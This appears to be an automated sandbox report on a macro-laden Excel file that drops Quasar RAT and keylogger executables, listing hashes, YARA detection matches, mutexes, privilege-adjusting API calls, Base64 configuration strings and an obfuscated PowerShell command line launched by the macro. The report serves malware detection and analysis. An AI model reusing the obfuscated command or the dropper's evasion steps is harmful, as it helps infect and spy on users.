Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_01F631E8
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_01F6B427
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_01F6474A
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_01F625B0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_01F625A0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_01F63D95
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_01F63180
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_01F6B8B9
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_01F60012
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_01F65AE0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_01F65AD0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_04142FFB
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_01F60048
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 35_2_003144A0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 35_2_003137D0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 35_2_00313488
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 35_2_00741CD0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 35_2_00743F5B
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A1810
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001AE138
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A3178
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A2229
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A8358
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A0470
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A0FC8
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A5811
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A4000
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A30EA
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A5178
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A5188
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001AD308
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A5338
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A5348
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A8349
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001ACBC0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001ABCA0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A4DB8
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A0F5D
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001AF748
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A3FF1
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_003E2090
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_003E31E8
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_003E474A
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_003EB3F9
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_003EB427
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_003E5C25
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_003E0012
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_003EB8B9
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_003E25B0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_003E25A0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_003E3180
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_003E5AE0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_003E5AD0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_00AC2FFB
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_003E0048
Source: spetsifikatsiya.xls | OLE indicator, VBA macros: true
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\JrekdQ.exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: String function: 006876A0 appears 87 times
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: String function: 006811C5 appears 76 times
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: String function: 006B08FC appears 807 times
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: String function: 00411C35 appears 40 times
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: String function: 00680E81 appears 125 times
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: String function: 006850AE appears 35 times
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: String function: 005CEF10 appears 135 times
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: String function: 00411FB1 appears 172 times
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: String function: 00696B06 appears 45 times
Source: C:\Users\user\AppData\Roaming\sp.exe | Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\sp.exe | Section loaded: sfc_os.dll
Source: spetsifikatsiya.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: dump.pcap, type: PCAP | Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000011.00000002.2113764449.000000000384C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Documents\pd.bat, type: DROPPED | Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5DVxvgK9jn5gaBl[1].exe.28.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: eyBLwzbrUF1mwXoy.exe.28.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 5DVxvgK9jn5gaBl[1].exe0.28.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: JrekdQ.exe.31.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, ???ue004?u1bf6u2a06u0d01????????????.csBase64 encoded string: 'muWPA0ZMZOZC16alqlb7OLoKFF6AK/WGExjSh2sTLzY/HNKE8rw/LjwNO8jxwG5P8XmanhcHXUh/Znan/Qha9A==', 'kdZuJNg3s3qi60d8KAw+Ogu5e+94NKyEBSKgEBwFzCVWwu2kGt++qLwK8TBsq+lTBXxsNcIHpRZ1cGkVMYWvzTSaElwiShLbehLklNW4YYQ=', '+bLBtFqvA62b9vNvvPQyjmGK2WpZ+RJ9pUtoxTtsb8K6WfUawvz1gS5iut++GrF4DuuuMzkFiMCEyLF9AaegJA==', 'v2HDs4RSygEAZ6NJNCuYwi0ACuluvNLNbRFYPlxXUpO0FxzAGLWq3OXdsjP5+ukjo6yDLqnUGh7wyi7nDtq/CQ==', 'jqflyylK/niLKf+GtR+Lv/aWEa6QVqAQUCBDd050Ntb2fHHztlgQMTWdADeZZF3mFDd9u+0ou/K5Jphk6b3V7Q==', 'rle7N1m2WcaSri/+BJFoH9R3R4bb8EbkaU2TYWRdWojx+g1t9ncREIrAWOvoDmETZzEe0Mw/2wR+/BF8yljPoBTG+f/JAv1YhyEeXfJysig=', 'z4mS0TG28az/6Zq6H1EWK43Z0L6V2PnE7ouOqTwEvdoVRXfhtFMdqKebh3cw7r71i5/CG3g7acrI4B9cvpwiqaer8YOnmXcM7ZzRm/qc8r4=', 'g0diI4GsK+sU5dVZUm/Qgsee4D9atKNMOgUKjSgMfBv6DVapU0ZNn4j2bVXd9/eONJ0gi7LLAe4+P+1lOMyL5Q=='
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winXLS@57/27@7/5
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_00960AB2 AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_00960A7B AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_0045624F __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_0042A2F9 __EH_prolog,CoInitialize,CoCreateInstance,CoUninitialize,
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_004231B3 __CxxThrowException@8,GetLastError,LoadResource,LockResource,SizeofResource,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\CCDE0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Mutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_dQvCIzmEBFgxmMuIEE
Source: C:\Users\user\AppData\Roaming\sp.exe | Mutant created: \Sessions\1\BaseNamedObjects\614c1de794e5e2f8f0d3a4fae3ccc083
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD690.tmp
Source: spetsifikatsiya.xls | OLE indicator, Workbook stream: true
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#.........h.......F...............F.......A.....`IC........v.....................KJ.............l.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j.....u................1.............}..v....xv......0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v.....z......0.\.............x.......$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../..................j....@{................1.............}..v.....{......0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0.\.....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.1.............}..v............ ...............x.......".......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;..................j......................1.............}..v............0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j......................1.............}..v............0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j....P.................1.............}..v............0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j......................1.............}..v............0.\.....................^.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j......................1.............}..v....0.......0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._..................j......................1.............}..v....P.......0.\.....................Z.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._..................j......................1.............}..v............0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j......................1.............}..v....P.......0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j......................1.............}..v............0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w....... . . .I.t.e.m.C.o.m.m.a.n.d.......1.............}..v....(.......0.\.............x...............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w..................j......................1.............}..v....`.......0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j......................1.............}..v............0.\.............x...............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................1.............}..v....(.......0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#.........h.......F...............F.......A.....`IC........v.....................KJ.............r.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j.....z................1.............}..v.....z......0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v.....~......0.\.............8.w.....$.......h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../..................j....P.................1.............}..v............0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.1.............}..v............0.\.............8.w.....".......h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;..................j......................1.............}..v............0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j......w...............1.............}..v....@.......0.\.....................`.......h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j......................1.............}..v....x.......0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j......w...............1.............}..v............0.\.....................^.......h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j....X.................1.............}..v............0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._..................j......w...............1.............}..v............0.\.....................`.......h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._..................j......................1.............}..v....8.......0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j......w...............1.............}..v............0.\.............................h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j......................1.............}..v....8.......0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w....... . . .o.c.a.t.i.o.n.C.o.m.m.a.n.d.1.............}..v....H.......0.\.............8.w.....".......h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w..................j......................1.............}..v............0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j......w...............1.............}..v............0.\.............8.w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................1.............}..v....H.......0.\...............w.............h...............
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............................@{?......................k..U.....................C.............(.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............X.*.....2..................J....
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............m.o.d.e........./.........................*......$.J............/...............8.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\............... .1.8.,.1. .............................$d..U...m.o.d.e..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\.......................................................$d..U...m.o.d.e..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H...............................@{?......................k..U.....................C.............(.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............X.*.....2..................J....
          Source: C:\Windows\System32\cmd.exe Console Write: ................H...............c.o.l.o.r......./.........................*......$.J............/...............8.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H............... .F.E. .................................$d..U...c.o.l.o..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H.......................................................$d..U...c.o.l.o..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H........................................................k..U.....................C.............(.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............X.*.....2..................J....
          Source: C:\Windows\System32\cmd.exe Console Write: ................H...............s.e.t.l.o.c.a.l./.........................*......$.J............/...............8.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H.......................................................$d..U...s.e.t.l..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H..................................J.....................k..U...`{.J..............C.............(.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H...............f.o.r...........`{.J....................$d..U...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H............... ./.F...........`{.J....................$d..U...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H............... .".t.o.k.e.n.s.=.4.-.5. .d.e.l.i.m.s.=... ."...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H............... .%.i. .i.n. ...=.4.-.5.................$d..U...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H...............(.'.v.e.r.'.). .d.o. .5.................$d..U...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H...............s.e.t...........d.o. .5.................$d..U...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H............... .V.E.R.S.I.O.N.=.%.i...%.j. ............d..U...s.e.t............DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H................................DC.....................$d..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................................................p.D.....................di..U............iC.......................*..............iC.............
          Source: C:\Windows\System32\cmd.exe Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............*.....2..................J....
          Source: C:\Windows\System32\cmd.exe Console Write: ................................s.e.t............\D.......................C...............D........J....x.........*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................................ .V.E.R.S.I.O.N.=.6...1. ...............Dj..U...s.e.t....iC.......................*..............iC.............
          Source: C:\Windows\System32\cmd.exe Console Write: ................................................=.6...1.................Dj..U...s.e.t....iC.......................*..............iC.............
          Source: C:\Windows\System32\cmd.exe Console Write: ................................................`{.J.....................k..U....$.J..............C.............(.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H...............i.f. ...........`{.J....................$d..U...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H...............".6...1.". .=.=. .".1.0...0.". ..........d..U...i.f. ............DC...............*..... .......................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H...............(................DC..................... .......................d1.........v......*........................J....
          Source: C:\Windows\System32\cmd.exe Console Write: ................H........................................................d..U...(................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H...............e.c.h.o.........}..v............................H...............................x.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H............... .".W.i.n.d.o.w.s. .1.0. .d.e.t.e.c.t.e.d.". . .e.c.h.o..........DC.............H.*.....0.......................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H............... ..... ..........DC......................e..U....................DC.............x.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................H...............r.e.g...........}..v............................H.................................*............. ..... .........
          Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................e..U...r.e.g............DC.....................b.......................
          Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>.....................................te..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. .................................te..U....................DC...............*.............................
